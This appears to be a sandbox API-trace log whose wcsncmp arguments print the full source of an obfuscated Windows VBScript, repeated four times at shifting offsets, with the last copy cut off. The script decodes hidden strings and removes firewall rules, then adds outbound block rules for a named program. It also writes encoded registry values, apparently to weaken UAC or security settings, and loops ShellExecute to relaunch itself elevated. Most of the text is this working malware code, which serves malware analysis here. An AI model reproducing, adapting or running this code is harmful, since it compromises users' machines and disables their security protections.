bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.931] wcsncmp (_String1="0\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0222.931] wcsncmp (_String1="\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.931] wcsncmp (_String1="\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.931] wcsncmp (_String1="Function bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 